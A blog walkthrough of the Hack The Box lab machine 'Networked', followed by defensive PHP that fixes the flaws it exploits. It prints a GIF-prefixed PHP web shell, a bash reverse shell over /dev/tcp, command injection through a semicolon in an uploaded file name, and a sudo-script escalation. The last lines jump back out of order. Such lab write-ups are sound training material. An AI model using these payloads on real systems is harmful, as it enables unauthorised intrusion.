EAkl Blog
Last updated 2 years ago

Hack The Box — Networked walkthrough

Hey folks, today we have a machine for everyone who loves CTF-style tricks built around PHP. Let's take a look at its info and get started.

Nmap scan

As usual, we start with an nmap scan: nmap -A -T4 -oG networked.gnmap 10.10.10.146

From the results we have 2 open ports, http and ssh, and 1 closed port, https.

After enumerating the website I didn't find anything interesting, so I checked the source code, and there was nothing there either.

After that I brute-forced the directories using dirsearch.

We have a bunch of interesting directories and files like backup, uploads and upload.php, so I checked /backup and found a tar file. After downloading and extracting it, I found 4 files.

After checking upload.php I understood how it handles the upload process: it checks the file size and the file extension.

I then changed the extension to shell.php.png and, as you can see, it still refuses the file.

So it refused my file even though its size was less than 60000 and its extension contained png.

So I tried adding a magic number at the beginning of the shell, as you can see: GIF8;<?php system($_GET['cmd']); ?> and it works.

From the brute-force step I had a page called /photos.php, so I visited it and saw that the file name had been changed.

Then I tried to execute a command through the cmd variable. This runs whoami on the server because the file extension is .php.png, so the server handles it as .php first.

The next step is invoking a reverse shell through this variable by typing bash -i >& /dev/tcp/ip/port 0>&1, with nc listening on the same port.

User flag

We have a shell now; let's find a way to get user privileges.

If you check the user's home directory, /home/guly/, you'll find a check_attack.php file. It contains an exec function, which executes commands on the server.

It executes rm -f file_path (with output sent to /dev/null) for any weird file name, and the file path is under /var/www/html/uploads. So if we can create a file there with a weird file name that carries a bash reverse shell, using ; in the file name to separate the commands, we then open netcat to listen on that port.

and user.txt is available now.
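The two weaknesses used above (an extension check that accepts shell.php.png plus a magic-number stub, and a cleanup script that passes the client-chosen file name to exec) are worth seeing fixed side by side. The following is an added example, not the box's own upload.php or check_attack.php (their source is not reproduced here); it assumes the form field is named myFile and that uploads live under /var/www/html/uploads as the walkthrough states.

```php
<?php
// Added example, not the box's upload.php or check_attack.php. Assumed: the form
// field is 'myFile' and uploads live under /var/www/html/uploads (from the writeup).
const UPLOAD_DIR = '/var/www/html/uploads';
const MAX_BYTES  = 60000;
// Whitelist keyed by the LAST extension; value is the MIME type the bytes must decode as.
const ALLOWED = ['png' => 'image/png', 'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'gif' => 'image/gif'];
function validate_upload(array $file): array
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return [false, 'upload failed'];
    }
    if ($file['size'] > MAX_BYTES) {
        return [false, 'file too large'];
    }
    // One extension only, taken from the end of the name: a substring test such as
    // strpos($name, 'png') accepts shell.php.png, which Apache may still run as PHP.
    $parts = explode('.', basename($file['name']));
    $ext   = strtolower(end($parts));
    if (count($parts) !== 2 || !isset(ALLOWED[$ext])) {
        return [false, 'extension not allowed'];
    }
    // Decode the content instead of trusting a magic number: "GIF8;<?php ..." is not a
    // parseable image. Defence in depth only; also disable PHP execution in UPLOAD_DIR.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info['mime'] !== ALLOWED[$ext]) {
        return [false, 'content does not match extension'];
    }
    // Server-generated name: no client bytes, so nothing like "; bash ..." can reach a
    // later exec("rm -f $path") in a cleanup script.
    return [true, UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext];
}

// Cleanup without a shell: unlink() treats the path as data, not as a command line.
// If exec() cannot be avoided, the path must be wrapped in escapeshellarg().
function remove_upload(string $path): bool
{
    $real = realpath($path);
    if ($real === false || strpos($real, UPLOAD_DIR . '/') !== 0) {
        return false; // refuse anything outside the uploads directory
    }
    return unlink($real);
}

[$ok, $result] = validate_upload($_FILES['myFile'] ?? []);
if (!$ok) {
    http_response_code(400);
    exit('Rejected: ' . $result);
}
move_uploaded_file($_FILES['myFile']['tmp_name'], $result);
```

With these checks the GIF8; stub from the walkthrough fails getimagesize(), the double extension fails the whitelist, and a ; in the original name never reaches a shell because the stored name is generated server-side.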

Root flag

By executing sudo -l to see the user's privileges, I found that he can run a command with sudo without a password.

After checking the file content:

The first section opens a new file with a heredoc (EoF), ends it at the second EoF, and writes the 3 lines between them into that file.

The second and third sections ask you to enter the values of 4 variables and write your answers into the new file.

After executing it and entering sh as any one of those variables, the server executes it as a bash command and gives you the shell back.

So let's try accessing it and uploading shell.php (I know it will refuse, but it was just a test).

I viewed it by accessing:

http://10.10.10.146/upload.php
http://10.10.10.146/photos.php/filename